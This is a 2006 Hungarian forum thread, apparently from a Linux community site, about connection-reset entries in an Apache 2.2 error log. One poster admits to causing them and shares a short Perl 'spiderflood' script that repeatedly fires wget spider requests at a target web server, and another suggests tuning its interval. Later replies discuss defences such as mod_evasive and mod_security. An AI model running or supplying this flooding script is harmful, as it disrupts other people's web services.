Üdvözlet,
Ezeket találtam szép számmal az apache2 (2.2) error logjában:
[Wed Mar 15 22:29:36 2006] [info] [client 213.114.*.*] (104)Connection reset by peer: core_output_filter: writing data to the network
[Wed Mar 15 22:29:36 2006] [info] [client 213.114.*.*] (32)Broken pipe: core_output_filter: writing data to the network
Találkozott már ilyennel valaki? Mit is takarhat? Gondolom, mivel "csak" [info], ezért nagy galiba nem lehet, nem?
- 1372 megtekintés
Hozzászólások
Csak erről az IP-ről jönnek, vagy összevissza sokhelyről? Könnyen lehet, hogy csak a "mégsem"-re nyomott a kliens letöltés közben. Ez ki is próbálható könnyen. Ha nagyon gyanussá kezd válni, akkor tovább kell vizsgálódni.
- A hozzászóláshoz be kell jelentkezni
Különböző IP címekről jönnek.
- A hozzászóláshoz be kell jelentkezni
Igen, láttam. Elég sok van belőle újabban.
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Nos igen, ebben nekem is benne van a kezem, bevallom...
A dolog lenyege: meddig birja a szerver ha lekerek 1 csomo oldalt, de nem toltom le, a szerver meg csak generalja a phpkat. Biztos sokan rajottek mar, es biztos nem en vagyok az egyetlen de nemakartam elmondani amig ki nem talaltam ra a megoldast. Jelentem nem talaltam ki, remelem ti tudtok benne segiteni. Itt a kod amivel ilyeneket el lehet kovetni:
#! /usr/bin/perl -w
# cod ownzd by Coornail ;)
$target = shift;
if ($target) {
system ("watch -n 0 wget -q --spider $target&");
} else {
printf ("Neee iiigy lamer =D\n");
printf ("./spiderflood [target]\n");
printf ("Ahol a target 1 webserverrel rendelkezo gep\n");
}
Valoszinu ez general nalatok ilyen logot. Ha tudtok ra megoldast hogy lehetne kivedeni szoljatok.
Ui: A fenti kod a te osszes memoriadat is bekebelezi 1 ido uan, at akartam irni cbe csak lusta voltam.
- A hozzászóláshoz be kell jelentkezni
Hát izé: http://www.cert.hu/szabaly/ (nincs de)
Egyébként a PHP-nál ki lehet kapcsolni, hogy a cancel után is tolja ki az oldalakat, illetve bekapcsolni.
- A hozzászóláshoz be kell jelentkezni
Ezt melyik opcióval lehet elérni?
- A hozzászóláshoz be kell jelentkezni
Ezt találtam a php -hez:
ignore_user_abort
Próbáltam TRUE -ra és FALSE -ra is, de ahogy néztem a logot, ugyan úgy benne vannak ezek a bejegyzések. Egyéb ötlet? Esetleg valamit az apache 2.2 -ben lehetne állítani?
- A hozzászóláshoz be kell jelentkezni
Coornail Örülök, hogy rá bírtalak venni, hogy kirakd...
Eddig is ezt kellett volna...úgy kb 4 hónapja...
És mindenre van megoldás, csak keresni kell...
én meg már mondtam, hogy "watch -n [0.1->0.5] wget -q --spider $target &" <<< [0.1->0.5] ~ válassz egyet...
mert így legalább kevésbé eszi a memóriádat mert vár azért közte valamit... monnyuk erősebb,d e te is előbb halsz le...
Kb 30-40sec-es generálási időre lehet ezzel lehúzni a hupot kb, ha egyszermély végzi...
Én iptables-ös fejlécvizsgálattal dolgoznék, de ennél azért van jobb módszer...
U.i csak Coornail-nak: mégegyszer köszönöm
- A hozzászóláshoz be kell jelentkezni
Még egy régi weblabor hírben (http://weblabor.hu/blog/20030127/modsecurity) olvastam egy apache modulról. Most elolvastam a hírt, de nem írták benne, hogy van védelem az ilyen jellegű floodok ellen, de mintha valahol azt olvastam volna.
Mindenesetre, szerintem nézzétek meg, hátha jó valamire :-)
Mondjuk szerintem arra nem nagyon van védelem, ha valaki felhasználja a botnetjében lévő Xszáz/ezer botját és benyitattja minden bottal.
Bocs, hogy nem tudtam jobban utánakeresni, de rohanni kell suliba.
- A hozzászóláshoz be kell jelentkezni
A mod_security nem igazán erre való. Helyette a flood ellen a mod_dosevasive-t (újabb nevén mod_evasive) érdemes megnézni.
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Ez jónak tűnik nagyon. Azért a mod_security -t is beizzítottam, az sem árthat.
- A hozzászóláshoz be kell jelentkezni